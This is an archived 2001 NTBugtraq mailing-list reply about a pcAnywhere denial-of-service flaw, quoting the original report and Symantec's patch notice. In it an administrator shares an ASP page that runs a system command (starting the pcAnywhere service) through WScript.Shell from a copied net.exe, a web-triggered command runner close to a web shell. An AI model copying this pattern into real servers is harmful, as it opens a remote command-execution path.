Re: pcAnywhere Remote DoS
From: Steven Tracy (Steven@PRIMACOMPUTER.COM)Date: 08/14/01
- Previous message: Russ: "Aftermath of Code Red"
- In reply to: Sym Security: "Re: pcAnywhere Remote DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <5.0.0.25.0.20010814123149.034328e0@mail.primacomputer.com> Date: Tue, 14 Aug 2001 12:49:52 +0800 From: Steven Tracy <Steven@PRIMACOMPUTER.COM> Subject: Re: pcAnywhere Remote DoS To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
I run most of my web servers behind firewalls, or at least with most
services unbound, so pcAnywhere is one of the few options I have to admin
the machines short of going to site.
One way I have used to work around this, and other problems is with a small
asp page that uses WSH to start/stop a service. Something like this:
<HTML>
<BODY>
Running Command<BR>
<%
set wshell = server.createobject("wscript.shell")
wshell.run "e:\le303mkjd9rnbs9\net start awhost32"
set wshell = nothing
%>
Command Run<BR>
</BODY>
</HTML>
The "e:\le303mkjd9rnbs9\" is a directory outside the web root that contains
a copy of net.exe, and any other things I need. Most executables under
%SystemRoot% are Interactive:RX,Admin:F, and therefore can not be run by
IUSR_xxxx, or System.
Best Regards,
Steven Tracy
At 09:21 PM 13-08-01, Sym Security wrote:
>Wed, 1 Aug 2001 14:17:35 -0400, John Thorton reported:
>
>Subject: pcAnywhere Remote DoS
>Comments: To: bugtraq@securityfocus.com
>Content-Type: text/plain; charset=iso-8859-1
>
>
>Tested on pcAnywhere 9.2, it seems if you connect then disconnect to
>pcAnywhere host service about 300 - 500 times the service will stop
>responding. The only way to get it to respond is to restart the service.
>The latest version of pcAnywhere is 10 and we don't have it but I would
>imagine it has the same problems.
>
>John Thornton Editor-In-Chief www.hackersdigest.com
>
>------------------------------------
>
>This issues was addressed in a later version of pcAnwhere than the one
>referenced here. The original issue was reported
> in a CIAC Security Bulletin, 5 March, 2001
>
> L-055: pcAnywhere Denial of Service, abnormal server connection
>http://ciac.llnl.gov/ciac/bulletins/l-055.shtml
>
>The fix for this issue is available in a LiveUpdate for pcAnywere 9.2.1 and
>10.0 and is also available as a downloadable patch. See SARC Security
>Alert, 5 March, 2001
>Subj: pcAnywhere, Denial of Service, abnormal server connection
>
>
>
>
>
>
>http://service1.symantec.com/sarc/sarc.nsf/info/html/pcAnywhere.Denial.of.Service.html
>
>
>Security issues related to Symantec products can be reported to
>symsecurity@symantec.com to ensure timely response.
>
>============================================================================
>Delivery co-sponsored by Trend Micro, Inc.
>============================================================================
>TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE
>
>If you are worried about email viruses, you need Trend Micro ScanMail for
>Exchange. ScanMail is the first antivirus solution that seamlessly
>integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail
>ensures 100% inbound and outbound email virus scanning and provides remote
>software management. Download a FREE 30-day trial copy of ScanMail and find
>out why it is the best:
>http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
>============================================================================
- Previous message: Russ: "Aftermath of Code Red"
- In reply to: Sym Security: "Re: pcAnywhere Remote DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
